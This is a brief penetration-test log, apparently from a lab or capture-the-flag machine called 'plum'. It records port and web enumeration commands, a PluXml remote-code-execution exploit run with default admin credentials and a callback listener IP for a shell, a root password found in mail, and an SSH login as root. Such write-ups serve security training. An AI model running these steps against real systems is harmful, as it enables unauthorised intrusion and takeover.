plum
๐งช Pentest Log: {{date:2025-08-03}}
๐ Target Information
- Machine Name: plum
- IP Address: 192.168.223.28
- Operating System: Linux
ip=192.168.223.28
๐ก Enumeration
๐ Port Scanning
Command Used
ports=$(nmap -p- --min-rate=1000 -T4 $ip | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
nmap -p$ports -sC -sV $ip -oN tcp_scan_result.txt
nmap -sU --top-ports 100 $ip -oN udp_scan_result.txt
Port 22
Port 80
Web Content Enumeration
gobuster dir -u http://$ip -w /usr/share/seclists/Discovery/Web-Content/common.txt
dirsearch -u http://$ip -r -o dirsearch.txt
Google pluxml 5.8.7 exploit
๐ฃ Exploitation
๐ Vulnerability Summary
- Service / Port: 80
- Vulnerability Type: RCE
๐ Exploit Execution
๐ง Exploit Method
Tool / Script Used:
https://github.com/erlaplante/pluxml-rce?tab=readme-ov-file
python3 pluxml.py http://$ip admin admin 192.168.45.163 80
๐งฌ Privilege Escalation
๐ค Current Access
- User: www-data
- Groups: www-data
- Shell Type: webshell
๐ Enumeration
Mail:
mail
1
found root credential
root:6s8kaZZNaZZYBMfh2YEW
๐ Privilege Escalation Exploit
๐ Exploit Summary
- Technique Used: Password Reuse
- Target Binary/Service: N/A
- Reference / Source: N/A
๐ง Exploit Steps
- Smash to root
ssh root@$ip